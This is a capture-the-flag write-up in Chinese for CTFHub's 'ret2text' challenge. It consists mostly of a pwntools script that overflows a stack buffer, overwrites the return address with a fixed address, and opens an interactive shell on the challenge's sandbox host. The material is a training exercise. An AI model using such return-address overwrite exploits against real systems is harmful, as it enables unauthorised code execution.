这是一个 64 位程序,未发现启用任何保护机制。
将溢出后覆盖的返回地址设置为图中所示的位置,即可获取 Shell。由于没有发现保护机制,该固定地址可以直接写入 payload。
from pwn import *
import re
# Target switch read by main(): 1 starts the local "pwn" binary, any other
# value connects to the remote challenge instance.
content = 0

# pwntools global settings: 64-bit Linux target, with debug-level logging so
# every byte sent and received is printed.
context.update(os="linux", arch="amd64", log_level="debug")
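def main():
    """Run the ret2text solution against the local binary or the remote sandbox.

    Reads the module-level ``content`` switch: 1 starts the local ``pwn``
    binary, any other value connects to the CTFHub challenge instance.
    Sends the overflow payload after the welcome prompt, hands the session
    to the user, and closes the connection afterwards.

    NOTE(review): the hard-coded return address relies on the write-up's
    statement that the binary has no protections; a stack canary or
    position-independent build would presumably defeat it.
    """
    if content == 1:
        peiqi = process("pwn")
    else:
        peiqi = remote("challenge-619914dcf99e6685.sandbox.ctfhub.com", 29602)

    try:
        # 0x70 + 8 filler bytes: presumably the 0x70-byte distance from the
        # buffer to the saved frame pointer, plus the 8-byte saved frame
        # pointer itself. TODO: confirm against the disassembly.
        payload = b"a" * (0x70 + 8)
        # The next 8 bytes land on the saved return address. 0x4007B8 is the
        # location shown in the write-up's screenshot (not visible here).
        payload += p64(0x4007B8)

        # Bytes literal: pwntools tubes work on bytes, and a str here raises
        # a BytesWarning under Python 3. The spelling "someting" is kept
        # as-is; presumably it matches the prompt the program prints.
        peiqi.recvuntil(b"Welcome to CTFHub ret2text.Input someting:\n")
        peiqi.sendline(payload)
        peiqi.interactive()
    finally:
        # Release the process or socket even if the exchange fails part-way.
        peiqi.close()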
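# Run only when executed as a script, so importing this module does not
# open a connection as a side effect.
if __name__ == "__main__":
    main()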